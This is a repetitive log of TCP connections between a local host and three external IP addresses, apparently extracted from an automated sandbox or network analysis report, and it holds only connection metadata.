            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
